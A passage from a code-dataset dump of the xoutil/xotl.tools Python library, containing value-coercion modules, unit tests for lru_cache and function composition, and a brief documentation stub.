12825, "license_type": "no_license", "max_line_length": 83, "num_lines": 461, "path": "/xotl/tools/values/simple.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Simple or internal coercers.\n\nWith coercers defined in this module, many of the `xotl.tools.string`:mod:\nutilities could be deprecated.\n\nIn Python 3, all arrays, not only those containing valid byte or unicode\nchars, are buffers.\n\n\"\"\"\n\nfrom xotl.tools.values import coercer, nil\n\n\n@coercer\ndef not_false_coercer(arg):\n \"\"\"Validate that `arg` is not a false value.\n\n Python convention for values considered True or False is not used here,\n our false values are only `None` or any false instance of\n `xotl.tools.symbols.boolean`:class: (of course including `False` itself).\n\n \"\"\"\n from xotl.tools.symbols import boolean\n\n false = arg is None or (not arg and isinstance(arg, boolean))\n return arg if not false else nil\n\n\ndef not_false(default):\n \"\"\"Create a coercer that returns `default` if `arg` is considered false.\n\n See `not_false_coercer`:func: for more information on values considered\n false.\n\n \"\"\"\n\n @coercer\n def inner_coercer(arg):\n coercer = not_false_coercer\n return arg if coercer(arg) is arg else coercer(default)\n\n return inner_coercer\n\n\ndef isnot(value):\n \"\"\"Create a coercer that returns `arg` if `arg` is not `value`.\"\"\"\n\n @coercer\n def inner_coercer(arg):\n return arg if arg is not value else nil\n\n return inner_coercer\n\n\n@coercer\ndef name_coerce(arg):\n \"\"\"If `arg` is a named object, return its name, else `nil`.\n\n Object names are always of `str` type, other types are considered\n invalid.\n\n Generator objects has the special `__name__` attribute, but they are\n ignored and considered invalid.\n\n \"\"\"\n from types import GeneratorType\n\n if isinstance(arg, GeneratorType):\n return nil\n else:\n if isinstance(arg, (staticmethod, classmethod)):\n fn = getattr(arg, \"__func__\", None)\n if fn:\n arg = fn\n res = getattr(arg, \"__name__\", None)\n return res if isinstance(res, str) else nil\n\n\n@coercer\ndef iterable_coerce(arg):\n \"\"\"Return the same argument if it is an iterable.\"\"\"\n from collections import Iterable\n\n return arg if isinstance(arg, Iterable) else nil\n\n\ndef collection(arg=nil, avoid=(), force=False, base=None, name=None):\n \"\"\"Coercer for logic collections.\n\n Inner coercer returns the same argument if it is a strict iterable. In\n Python, strings are normally iterables, but never in our logic. So::\n\n >>> collection('abc') is nil\n True\n\n This function could directly check an argument if it isn't ``nil``, or\n returns a coercer using extra parameters:\n\n :param avoid: a type or tuple of extra types to ignore as valid\n collections; for example::\n\n >>> collection(avoid=dict)({}) is nil\n True\n >>> collection()({}) is nil\n False\n\n :param force: if main argument is not a valid collection, it is are\n wrapped inner a list::\n\n >>> collection(avoid=(dict,), force=True)({}) == [{}]\n True\n\n :param base: if not ``None``, must be the base to check instead of\n `~collections.Iterable`:class:.\n\n :param name: decorate inner coercer with that function name.\n\n \"\"\"\n if not base:\n from collections import Iterable as base\n if not isinstance(avoid, tuple):\n avoid = (avoid,)\n\n @coercer\n def collection_coerce(arg):\n invalid = (str,) + avoid\n ok = not isinstance(arg, invalid) and isinstance(arg, base)\n return arg if ok else ([arg] if force else nil)\n\n if arg is nil:\n doc = (\n \"Return the same argument if it is a strict iterable.\\n \"\n \"Strings{} are not considered valid iterables in this case.\\n\"\n ).format(\" and {}\".format(avoid) if avoid else \"\")\n if force:\n doc += \" A non iterable argument is wrapped in a list.\\n\"\n collection_coerce.__doc__ = doc\n del doc\n if name:\n collection_coerce.__name__ = name\n return collection_coerce\n else:\n assert not name\n return collection_coerce(arg)\n\n\nfrom collections import Mapping, Sequence # noqa\n\nlogic_iterable_coerce = collection(name=\"logic_iterable_coerce\")\nforce_iterable_coerce = collection(force=True, name=\"force_iterable_coerce\")\nlogic_collection_coerce = collection(avoid=Mapping, name=\"logic_collection_coerce\")\nforce_collection_coerce = collection(\n avoid=Mapping, force=True, name=\"force_collection_coerce\"\n)\nlogic_sequence_coerce = collection(\n avoid=Mapping, base=Sequence, name=\"logic_sequence_coerce\"\n)\nforce_sequence_coerce = collection(\n avoid=Mapping, force=True, base=Sequence, name=\"force_sequence_coerce\"\n)\ndel Mapping, Sequence\n\n\n@coercer\ndef decode_coerce(arg):\n \"\"\"Decode objects implementing the buffer protocol.\"\"\"\n import locale\n\n encoding = locale.getpreferredencoding() or \"UTF-8\"\n decode = getattr(arg, \"decode\", None)\n if callable(decode):\n try:\n res = decode(encoding, \"replace\")\n if not isinstance(res, str):\n res = None\n except Exception:\n res = None\n else:\n res = None\n if res is None:\n try:\n # TODO: All arrays are decoded, and not only those containing\n # valid byte or unicode characters.\n import codecs\n\n res = codecs.decode(arg, encoding, \"replace\")\n except Exception:\n res = nil\n return res\n\n\n@coercer\ndef encode_coerce(arg):\n \"\"\"Encode string objects.\"\"\"\n import locale\n\n encoding = locale.getpreferredencoding() or \"UTF-8\"\n encode = getattr(arg, \"encode\", None)\n if callable(encode):\n try:\n res = encode(encoding, \"replace\")\n if not isinstance(res, bytes):\n res = None\n except Exception:\n res = None\n else:\n res = None\n if res is None:\n try:\n import codecs\n\n res = codecs.encode(arg, encoding, \"replace\")\n except Exception:\n res = nil\n return res\n\n\n@coercer\ndef unicode_coerce(arg):\n \"\"\"Decode a buffer or any object returning unicode text.\n\n Uses the defined `encoding` system value.\n\n In Python 2.x unicode has a special type different to `str` but in Python\n 3 coincide with `str` type.\n\n Name is used in named objects, see `name_coerce`:func: for more\n information.\n\n See `str_coerce`:func: to coerce to standard string type, `bytes` in\n Python 2.x and unicode (`str`) in Python 3.\n\n .. versionadded:: 1.7.0\n\n \"\"\"\n from array import array\n\n aux = name_coerce(arg)\n if aux is not nil:\n arg = aux\n if isinstance(arg, str):\n return arg\n elif isinstance(arg, bytearray):\n arg = bytes(arg)\n elif isinstance(arg, memoryview):\n arg = arg.tobytes()\n elif isinstance(arg, array):\n try:\n return arg.tounicode()\n except Exception:\n try:\n arg = bytes(bytearray(arg.tolist()))\n except Exception:\n arg = str(arg)\n return arg\n\n res = decode_coerce(arg)\n return str(arg) if res is nil else res\n\n\n@coercer\ndef bytes_coerce(arg):\n \"\"\"Encode an unicode string (or any object) returning a bytes buffer.\n\n Uses the defined `encoding` system value.\n\n In Python 2.x `bytes` coincide with `str` type, in Python 3 `str` uses\n unicode and `str` is different to `bytes`.\n\n There are differences if you want to obtain a buffer in Python 2.x and\n Python 3; for example, the following code obtain different results::\n\n >>> ba = bytes([65, 66, 67])\n\n In Python 2.x is obtained the string ``\"[65, 66, 67]\"`` and in Python 3\n ``b\"ABC\"``. This function normalize these differences.\n\n Name is used in named objects, see `name_coerce`:func: for more\n information.\n\n See `str_coerce`:func: to coerce to standard string type, `bytes` in\n Python 2.x and unicode (`str`) in Python 3.\n\n Always returns the `bytes` type.\n\n .. versionadded:: 1.7.0\n\n \"\"\"\n from array import array\n\n aux = name_coerce(arg)\n if aux is not nil:\n arg = aux\n if isinstance(arg, bytes):\n return arg\n elif isinstance(arg, bytearray):\n return bytes(arg)\n elif isinstance(arg, memoryview):\n return arg.tobytes()\n elif isinstance(arg, array):\n try:\n arg = arg.tounicode()\n except Exception:\n try:\n return bytes(bytearray(arg.tolist()))\n except Exception:\n arg = str(arg)\n res = encode_coerce(arg)\n return encode_coerce(str(arg)) if res is nil else res\n\n\n@coercer\ndef str_coerce(arg):\n \"\"\"Coerce to standard string type.\n\n `bytes` in Python 2.x and unicode (`str`) in Python 3.\n\n .. versionadded:: 1.7.0\n\n .. deprecated:: 2.0.6\n\n \"\"\"\n return unicode_coerce(arg)\n\n\n@coercer\ndef ascii_coerce(arg):\n \"\"\"Coerce to string containing only ASCII characters.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n import unicodedata\n\n if not isinstance(arg, str):\n arg = unicode_coerce(arg)\n res = unicodedata.normalize(\"NFKD\", arg).encode(\"ascii\", \"ignore\")\n return str_coerce(res)\n\n\n@coercer\ndef ascii_set_coerce(arg):\n \"\"\"Coerce to string with only ASCII characters removing repetitions.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return \"\".join(set(ascii_coerce(arg)))\n\n\n@coercer\ndef lower_ascii_coerce(arg):\n \"\"\"Coerce to string containing only lower-case ASCII characters.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return ascii_coerce(arg).lower()\n\n\n@coercer\ndef lower_ascii_set_coerce(arg):\n \"\"\"Coerce to string with only lower-case ASCII chars removing repetitions.\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n \"\"\"\n return \"\".join(set(lower_ascii_coerce(arg)))\n\n\n@coercer\ndef chars_coerce(arg):\n \"\"\"Convert to unicode characters.\n\n If `arg` is an integer between ``0`` and ``0x10ffff`` is converted\n assuming it as ordinal unicode code, else is converted with\n `unicode_coerce`:meth:.\n\n \"\"\"\n if isinstance(arg, int) and 0 <= arg <= 0x10FFFF:\n return chr(arg)\n else:\n return unicode_coerce(arg)\n\n\n@coercer\ndef strict_string_coerce(arg):\n \"\"\"Coerce to string only if argument is a valid string type.\"\"\"\n return str_coerce(arg) if isinstance(arg, str) else nil\n\n\n# TODO: Why is this here\nclass text(str):\n \"\"\"Return a nice text representation of one object.\n\n text(obj='') -> text\n\n text(bytes_or_buffer[, encoding[, errors]]) -> text\n\n Create a new string object from the given object. If `encoding` or\n `errors` is specified, then the object must expose a data buffer that will\n be decoded using the given encoding and error handler. Otherwise, returns\n the result of object text representation.\n\n :param encoding: defaults to ``sys.getdefaultencoding()``.\n\n :param errors: defaults to 'strict'.\n\n Method join is improved, in order to receive any collection of objects,\n as variable number of arguments or as one iterable.\n\n \"\"\"\n\n def __new__(cls, obj=\"\", *args, **kwargs):\n if not (args or kwargs):\n obj = unicode_coerce(obj)\n return super().__new__(cls, obj, *args, **kwargs)\n\n def join(self, *args):\n \"\"\"S.join(variable_number_args or iterable) -> text\n\n Return a text which is the concatenation of the objects (converted to\n text) in argument items. The separator between elements is `S`.\n\n See `chr_join`:meth: for other vertion of this functionality.\n\n \"\"\"\n return self._join(unicode_coerce, args)\n\n def chr_join(self, *args):\n \"\"\"S.chr_join(variable_number_args or iterable) -> text\n\n Return a text which is the concatenation of the objects (converted to\n text) in argument items. The separator between elements is `S`.\n\n Difference with `join`:meth: is that integers between ``0`` and\n ``0x10ffff`` are converted to characters as unicode ordinal.\n\n \"\"\"\n return self._join(chars_coerce, args)\n\n def _join(self, coercer, args):\n \"\"\"Protected method to implement `join`:meth: and `chr_join`:meth:.\"\"\"\n from collections import Iterable\n\n if len(args) == 1 and isinstance(args[0], Iterable):\n args = args[0]\n return super().join(coercer(obj) for obj in args)\n" }, { "alpha_fraction": 0.5688151121139526, "alphanum_fraction": 0.5890796780586243, "avg_line_length": 25.514925003051758, "blob_id": "85f530c25c81f6d068d5b8d07c2d485ab27370c3", "content_id": "6afaa73e03df412dc6966b887b8ea63333a7f529", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3554, "license_type": "no_license", "max_line_length": 79, "num_lines": 134, "path": "/tests/test_functools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\n\nfrom contextlib import contextmanager\nfrom datetime import datetime, timedelta\n\nfrom xoutil.future.functools import lru_cache\n\n\n@lru_cache(3)\ndef fib(n):\n print(n)\n if n <= 1:\n return 1\n else:\n # It seems that there's a difference in the execution path for `return\n # fib(n-2) + fib(n-1)` between Python 2.7 and Python 3.2, so let's make\n # more explicit the order we'd like so the test is more reliable.\n a = fib(n - 1)\n b = fib(n - 2)\n return a + b\n\n\ndef takes_no_more_than(duration, msg=None):\n if not msg:\n msg = \"It took longer than {s} seconds\".format(s=duration)\n\n @contextmanager\n def inner():\n start = datetime.now()\n yield\n end = datetime.now()\n max_duration = timedelta(seconds=duration)\n if (end - start) > max_duration:\n raise AssertionError(msg)\n\n return inner()\n\n\ndef test_lrucache():\n # Without caching fib(120) would take ages. On a 2.20GHz laptop with\n # caching this takes less than 1 sec, so let's test that it will respond in\n # no more than 3 min to allow very slow machines testing this code.\n fib.cache_clear()\n with takes_no_more_than(90):\n assert fib(120) == 8670007398507948658051921\n\n\ndef test_lrucache_stats():\n pass\n\n\nfrom xoutil.fp.tools import compose, identity\n\n\nclass TestCompose(unittest.TestCase):\n def test_needs_at_least_an_argument(self):\n self.assertIs(compose(), identity)\n\n def test_single_argument_is_identitical(self):\n def anything():\n pass\n\n self.assertIs(anything, compose(anything))\n\n def test_only_callables(self):\n with self.assertRaises(TypeError):\n compose(1)\n\n def test_simple_case(self):\n incr = lambda x: x + 1\n add_3 = compose(incr, incr, incr)\n self.assertEqual(3, add_3(0))\n\n def test_with_pow(self):\n from xoutil.future.functools import power\n\n incr = lambda x: x + 1\n add_1 = power(incr, 1)\n self.assertIs(incr, add_1)\n add_3 = power(incr, 3)\n self.assertEqual(3, add_3(0))\n\n\ndef test_lwraps():\n from xoutil.future.functools import lwraps\n\n class foobar:\n @lwraps(\"method-one\", one=True)\n def one(self):\n return type(self).__name__\n\n @lwraps(\"method-two\", two=True)\n @classmethod\n def two(cls):\n return cls.__name__\n\n @lwraps(\"method-three\", three=True)\n @staticmethod\n def three():\n return \"foobar\"\n\n @lwraps(\"function-four\", four=True, one=False)\n def four(*args):\n return [(arg.__name__, arg()) for arg in args]\n\n f = foobar()\n names = (\"method-one\", \"method-two\", \"method-three\", \"function-four\")\n\n assert four.__name__ == names[3]\n assert foobar.one.__name__ == names[0]\n assert foobar.two.__name__ == names[1]\n assert foobar.three.__name__ == names[2]\n assert f.one.__name__ == names[0]\n assert f.two.__name__ == names[1]\n assert f.three.__name__ == names[2]\n\n assert four.four\n assert not four.one\n assert f.one.one\n assert f.two.two\n assert f.three.three\n\n for i, (a, b) in enumerate(four(f.one, f.two, f.three)):\n assert a == names[i]\n assert b == \"foobar\"\n" }, { "alpha_fraction": 0.420895516872406, "alphanum_fraction": 0.420895516872406, "avg_line_length": 46.85714340209961, "blob_id": "e8d30bd1bb7f6cbc0de3ab313ab2a5db4f8ae155", "content_id": "de616626a196bcedddaeac70c40a822e325c2c57", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 335, "license_type": "permissive", "max_line_length": 74, "num_lines": 7, "path": "/docs/source/xotl.tools/testing/datetime.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "========================================================================\n :mod:`xotl.tools.testing.datetime` -- Generators for date and datetime\n========================================================================\n\n.. module:: xotl.tools.testing.datetime\n\n.. autofunction:: timespans(dates=None, unbounds='any', always_valid=True)\n" }, { "alpha_fraction": 0.5514221787452698, "alphanum_fraction": 0.5561420917510986, "avg_line_length": 27.934412002563477, "blob_id": "8f68dd535f5794ab63e77d9d23581a03ee9620a6", "content_id": "dcdd02187b427aa0a091ed9818ddc5cdf6fcfb0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32209, "license_type": "no_license", "max_line_length": 84, "num_lines": 1113, "path": "/xotl/tools/values/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some generic coercers (or checkers) for value types.\n\nThis module coercion function are not related in any way to deprecated old\npython feature, are similar to a combination of object mold/check:\n\n- *Mold* - Fit values to expected conventions.\n\n- *Check* - These functions must return `nil` [#pyni]_ special value to\n specify that expected fit is not possible.\n\n.. [#pyni] We don't use Python classic `NotImplemented` special value in order\n to obtain False if the value is not coerced (`nil`).\n\nA custom coercer could be created with closures, for an example see\n`create_int_range_coerce`:func:.\n\nThis module uses `Unset` value to define absent -not being specified-\narguments.\n\nAlso contains sub-modules to obtain, convert and check values of common types.\n\n.. versionadded:: 1.7.0\n\n\"\"\"\n\nimport re\nfrom abc import ABCMeta\n\nfrom xotl.tools.future.functools import lwraps\nfrom xotl.tools.symbols import boolean, Unset\nfrom xotl.tools.fp.prove import vouch\n\nfrom xotl.tools.deprecation import deprecate_linked\n\ndeprecate_linked(check=\"xotl.tools.values\")\ndel deprecate_linked\n\n\n_coercer_decorator = lwraps(__coercer__=True) # FIX: refactor\n\n\nclass logical(boolean):\n \"\"\"Represent Common Lisp two special values `t` and `nil`.\n\n Include redefinition of `__call__`:meth: to check values with special\n semantic:\n\n - When called as ``t(arg)``, check if `arg` is not `nil` returning a\n logical true: the same argument if `arg` is nil or a true boolean value,\n else return `t`. That means that `False` or `0` are valid true values\n for Common Lisp but not for Python.\n\n - When called as ``nil(arg)``, check if `arg` is `nil` returning `t` or\n `nil` if not.\n\n Constructor could receive a valid name ('nil' or 't') or any other\n ``boolean`` instance.\n\n \"\"\"\n\n __slots__ = ()\n _valid = {\"nil\": False, \"t\": True}\n\n def __new__(cls, arg):\n from xotl.tools.symbols import boolean\n from xotl.tools.symbols import Invalid\n\n name = (\"t\" if arg else \"nil\") if isinstance(arg, boolean) else arg\n value = cls._valid.get(name, Invalid)\n if value is not Invalid:\n return super().__new__(cls, name, value)\n else:\n msg = 'retrieving invalid logical instance \"{}\"'\n raise TypeError(msg.format(arg))\n\n def __call__(self, arg):\n if self: # self is t\n return arg if arg or arg is nil else self\n else: # self is nil\n return t if arg is self else self\n\n\nnil, t = logical(\"nil\"), logical(\"t\")\n\n\nclass MetaCoercer(ABCMeta):\n r\"\"\"Meta-class for `coercer`:class:.\n\n This meta-class allows that several objects are considered valid instances\n of `coercer`:class:\\ :\n\n - Functions decorated with `coercer`:class: (used with its decorator\n facet).\n\n - Instances of any sub-class of `custom`:class:.\n\n - Instances of `coercer`:class: itself.\n\n See the class declaration (`coercer`:class:) for more information.\n\n \"\"\"\n\n def __instancecheck__(self, instance):\n return getattr(instance, \"__coercer__\", False) or super().__instancecheck__(\n instance\n )\n\n\nclass coercer(metaclass=MetaCoercer):\n \"\"\"Special coercer class.\n\n This class has several facets:\n\n - Pure type-checkers when a type or tuple of types are received as\n argument. See `istype`:class: for more information.\n\n - Return equivalent coercer from some special values:\n\n * Any true value -> identity_coerce\n\n * Any false or empty value -> void_coerce\n\n - A decorator for functions; when a function is given, decorate it to\n become a coercer. The mark itself is not enough, functions intended to\n be coercers must fulfills the protocol (not to produce exception and\n return `nil` on fails). For example::\n\n >>> @coercer\n ... def age_coerce(arg):\n ... res = int_coerce(arg)\n ... return res if t(res) and 0 < arg <= 120 else nil\n\n # TODO: Change next, don't use isinstance\n >>> isinstance(age_coerce, coercer)\n True\n\n \"\"\"\n\n __slots__ = ()\n __coercer__ = True\n\n def __new__(cls, source):\n from types import FunctionType as function\n from xotl.tools.symbols import boolean\n\n if source == 1 and isinstance(source, boolean):\n return identity_coerce\n elif source is None or (source == 0 and isinstance(source, boolean)):\n return void_coerce\n elif isinstance(source, coercer): # TODO: don't use isinstance\n return source\n elif isinstance(source, (function, staticmethod, classmethod)):\n return _coercer_decorator(source)\n else:\n inner = types_tuple_coerce(source)\n return istype(inner) if inner else nil\n\n\ndef coercer_name(arg, join=None):\n \"\"\"Get the name of a coercer.\n\n :param arg: Coercer to get the name. Also processes collections (tuple,\n list, or set) of coercers. Any other value is considered invalid\n and raises an exception.\n\n :param join: When a collection is used; if this argument is None a\n collection of names is returned, if not None then is used to join\n the items in a resulting string.\n\n For example::\n\n >>> coercer_name((int_coerce, float_coerce))\n ('int', 'float')\n\n >>> coercer_name((int_coerce, float_coerce), join='-')\n 'int-float'\n\n To obtain pretty-print tuples, use something like::\n\n >>> coercer_name((int_coerce, float_coerce),\n ... join=lambda arg: '(%s)' % ', '.join(arg))\n\n This function not only works with coercers, all objects that fulfill\n needed protocol to get names will also be valid.\n\n \"\"\"\n # TODO: Maybe this function must be moved to `xotl.tools.names`\n if isinstance(arg, (tuple, list, set)):\n res = type(arg)(coercer_name(c) for c in arg)\n if isinstance(join, str):\n join = join.join\n return str(join(res)) if join else res\n else:\n try:\n res = arg.__name__\n except Exception:\n res = str(arg)\n suffix = str(\"_coerce\")\n if res.endswith(suffix):\n res = res[: -len(suffix)]\n return res\n\n\n@coercer\ndef identity_coerce(arg):\n \"Leaves unchanged the passed argument `arg`.\"\n return arg\n\n\n@coercer\ndef void_coerce(arg):\n \"\"\"Always `nil`.\"\"\"\n return nil\n\n\n@coercer\ndef type_coerce(arg):\n \"\"\"Check if `arg` is a valid type.\"\"\"\n return arg if isinstance(arg, type) else nil\n\n\n@coercer\ndef types_tuple_coerce(arg):\n \"\"\"Check if `arg` is valid for `isinstance` or `issubclass` 2nd argument.\n\n Type checkers are any class, a type or tuple of types. For example::\n\n >>> types_tuple_coerce(object) == (object,)\n True\n\n >>> types_tuple_coerce((int, float)) == (int, float)\n true\n\n >>> types_tuple_coerce('not-a-type') is nil\n True\n\n See `type_coerce` for more information.\n\n \"\"\"\n if t(type_coerce(arg)):\n return (arg,)\n elif isinstance(arg, tuple) and all(t(type_coerce(tp)) for tp in arg):\n return arg\n else:\n return nil\n\n\n@coercer\ndef callable_coerce(arg):\n \"\"\"Check if `arg` is a callable object.\"\"\"\n return arg if callable(arg) else nil\n\n\n@coercer\ndef file_coerce(arg):\n \"\"\"Check if `arg` is a file-like object.\"\"\"\n from io import IOBase\n\n METHODS = (\"close\", \"write\", \"read\")\n ok = isinstance(arg, IOBase) or all(hasattr(arg, a) for a in METHODS)\n return arg if ok else nil\n\n\n@coercer\ndef float_coerce(arg):\n \"\"\"Check if `arg` is a valid float.\n\n Other types are checked (string, int, complex).\n\n \"\"\"\n if isinstance(arg, float):\n return arg\n elif isinstance(arg, int):\n return float(arg)\n elif isinstance(arg, (str, bytes)):\n try:\n return float(arg)\n except ValueError:\n return nil\n elif isinstance(arg, complex):\n return arg.real if arg.imag == 0 else nil\n else:\n return nil\n\n\n@coercer\ndef int_coerce(arg):\n \"\"\"Check if `arg` is a valid integer.\n\n Other types are checked (string, float, complex).\n\n \"\"\"\n if isinstance(arg, int):\n return arg\n else:\n arg = float_coerce(arg)\n if t(arg):\n res = int(arg)\n return res if arg - res == 0 else nil\n else:\n return nil\n\n\n@coercer\ndef number_coerce(arg):\n \"\"\"Check if `arg` is a valid number (integer or float).\n\n Types that are checked (string, int, float, complex).\n\n \"\"\"\n if isinstance(arg, int):\n return arg\n else:\n f = float_coerce(arg)\n if t(f):\n i = int(f)\n return i if f - i == 0 else f\n else:\n return nil\n\n\n@coercer\ndef positive_int_coerce(arg):\n \"\"\"Check if `arg` is a valid positive integer.\"\"\"\n res = int_coerce(arg)\n return res if res is nil or res >= 0 else nil\n\n\ndef create_int_range_coerce(min, max):\n \"\"\"Create a coercer to check integers between a range.\"\"\"\n min, max = vouch(int_coerce, min), vouch(int_coerce, max)\n if min < max:\n\n @coercer\n def inner(arg):\n 'Check if `arg` is a valid integer between \"{}\" and \"{}\".'\n arg = int_coerce(arg)\n if t(arg) and min <= arg <= max:\n return arg\n else:\n return nil\n\n inner.__name__ = str(\"int_between_{}_and_{}_coerce\".format(min, max))\n inner.__doc__ = inner.__doc__.format(min, max)\n return inner\n else:\n msg = '\"{}\" must be less than or equal \"{}\"'\n raise ValueError(msg.format(min, max))\n\n\n# Identifiers and strings\n\n# TODO: In Py3k \"ña\" is a valid identifier and this regex won't allow it\n_IDENTIFIER_REGEX = re.compile(r\"(?i)^[_a-z][\\w]*$\")\n\n\n# XXX: 'eight' pending.\n@coercer\ndef identifier_coerce(arg):\n \"\"\"Check if `arg` is a valid Python identifier.\n\n .. note:: Only Python 2's version of valid identifier. This means that\n some Python 3 valid identifiers are not considered valid. This\n helps to keep things working the same in Python 2 and 3.\n\n \"\"\"\n ok = isinstance(arg, str) and _IDENTIFIER_REGEX.match(arg)\n return str(arg) if ok else nil\n\n\n_FULL_IDENTIFIER_REGEX = re.compile(r\"(?i)^[_a-z][\\w]*([.][_a-z][\\w]*)*$\")\n\n\n@coercer\ndef full_identifier_coerce(arg):\n \"\"\"Check if `arg` is a valid dotted Python identifier.\n\n See `identifier_coerce`:func: for what \"validity\" means.\n\n \"\"\"\n ok = isinstance(arg, str) and _FULL_IDENTIFIER_REGEX.match(arg)\n return str(arg) if ok else nil\n\n\n@coercer\ndef names_coerce(arg):\n \"\"\"Check `arg` as a tuple of valid object names (identifiers).\n\n If only one string is given, is returned as the only member of the\n resulting tuple.\n\n \"\"\"\n arg = (arg,) if isinstance(arg, str) else tuple(arg)\n return iterable(identifier_coerce)(arg)\n\n\n# == Iterators ==\n\n\ndef create_unique_member_coerce(coerce, container):\n \"\"\"Useful to wrap member coercers when coercing containers.\n\n See `iterable`:class: and `mapping`:class:.\n\n Resulting coercer check that a member must be unique (not repeated) after\n it's coerced.\n\n For example::\n\n >>> from xotl.tools.values import (mapping, create_unique_member_coerce,\n ... int_coerce, float_coerce)\n\n >>> sample = {'1': 1, 2.0: '3', 1.0 + 0j: '4.1'}\n\n >>> dc = mapping(int_coerce, float_coerce)\n >>> dc(dict(sample))\n {1: 1.0, 2: 3.0}\n\n >>> dc = mapping(create_unique_member_coerce(int_coerce), float_coerce)\n >>> dc(dict(sample))\n nil\n\n \"\"\"\n coerce = vouch(coercer, coerce)\n\n @coercer\n def inner(arg):\n \"\"\"Check a member with \"{}\" coercer and warrant that is unique.\"\"\"\n # assert arg in container\n res = coerce(arg)\n if t(res) and hash(res) != hash(arg) and res in container:\n res = nil\n return res\n\n cname = coercer_name(coerce)\n inner.__name__ = str(\"unique_member_{}_coerce\".format(cname))\n inner.__doc__ = inner.__doc__.format(cname)\n return inner\n\n\n@coercer\ndef sized_coerce(arg):\n \"\"\"Return a valid sized iterable from `arg`.\n\n If `arg` is iterable but not sized, is converted to a list. For example::\n\n >>> sized_coerce(i for i in range(1, 10, 2))\n [1, 3, 5, 7, 9]\n\n >>> s = {1, 2, 3}\n >>> sized_coerce(s) is s\n True\n\n \"\"\"\n from collections import Iterable, Sized\n\n if isinstance(arg, Iterable):\n return arg if isinstance(arg, Sized) else list(arg)\n else:\n return nil\n\n\[email protected]\nclass custom:\n \"\"\"Base class for any custom coercer.\n\n The field `inner` stores an internal data used for the custom coercer;\n could be a callable, an inner coercer, or a tuple of inner checkers if\n more than one is needed, ...\n\n The field `scope` stores the exit (not regular) condition: the value that\n fails or -if needed- a tuple with (exit-value, exit-coercer) or\n (error-value, error). The exit condition is not always a failure, for\n example in `some`:class: it is the one that is valid among other inner\n coercers. To understand better this think on (AND, OR) operators a chain\n of ANDs exits with the first failure and a chains of ORs exits with the\n first success.\n\n All custom coercers are callable (must redefine `__call__`:meth:)\n receiving one argument that must be coerced. For example::\n\n >>> def foobar(*args):\n ... coerce = pargs(int_coerce)\n ... return coerce(args)\n\n This class has two protected fields (`_str_join` and `_repr_join`) that\n are used to call `coercer_name`:func: in `__str__`:meth: and\n `__repr__`:meth: special methods.\n\n \"\"\"\n\n __slots__ = (\"inner\", \"scope\")\n\n _str_join = \"_\"\n _repr_join = \", \"\n\n def __init__(self, *args, **kwargs):\n # This constructor is a placeholder for those custom coercers that can\n # return an instance of a different type in the `__new__`:meth:.\n self.scope = Unset\n\n def __str__(self):\n name = coercer_name(self.inner, join=self._str_join)\n cls_name = type(self).__name__\n return str(\"{}_{}_coerce\".format(name, cls_name))\n\n def __repr__(self):\n name = coercer_name(self.inner, join=self._repr_join)\n cls_name = type(self).__name__\n return str(\"{}({})\".format(cls_name, name))\n\n def __call__(self, arg):\n return nil\n\n @classmethod\n def flatten(cls, obj, avoid=Unset):\n \"\"\"Flatten a coercer set.\n\n :param obj: Could be a coercer representing other inner coercers, or a\n tuple or list containing coercers.\n\n \"\"\"\n aux = obj.inner if isinstance(obj, cls) else obj\n if isinstance(aux, (tuple, list)):\n if not types_tuple_coerce(aux):\n res = (i for l in map(cls.flatten, aux) for i in l)\n else:\n res = (coercer(aux),)\n else:\n res = (aux,)\n if avoid is not Unset:\n res = (i for i in res if i is not avoid)\n return tuple(res)\n\n\nclass istype(custom):\n \"\"\"Pure type-checker.\n\n It's constructed from an argument valid for `types_tuple_coerce`:func:\n coercer.\n\n For example::\n\n >>> int_coerce = istype(int)\n\n >>> int_coerce(1)\n 1\n\n >>> int_coerce('1')\n nil\n\n >>> number_coerce = istype((int, float, complex))\n\n >>> number_coerce(1.25)\n 1.25\n\n >>> number_coerce('1.25')\n nil\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, types):\n if types:\n self = super().__new__(cls)\n self.inner = vouch(types_tuple_coerce, types)\n return self\n else:\n return void_coerce\n\n def __call__(self, arg):\n return arg if isinstance(arg, self.inner) else nil\n\n\nclass typecast(istype):\n \"\"\"A type-caster.\n\n It's constructed from an argument valid for `types_tuple_coerce`:func:\n coercer. Similar to `istype`:class: but try to convert the value if\n needed.\n\n For example::\n\n >>> int_cast = typecast(int)\n\n >>> int_cast('1')\n 1\n\n >>> int_cast('1x')\n nil\n\n \"\"\"\n\n __slots__ = ()\n\n def __call__(self, arg):\n res = super().__call__(arg)\n i = 0\n while not t(res) and i < len(self.inner):\n try:\n tp = self.inner[i]\n res = tp(arg)\n self.scope = tp\n except Exception:\n i += 1\n return res\n\n\nclass safe(custom):\n \"\"\"Uses a function (or callable) in a safe way.\n\n Receives a coercer that expects only one argument and returns another\n 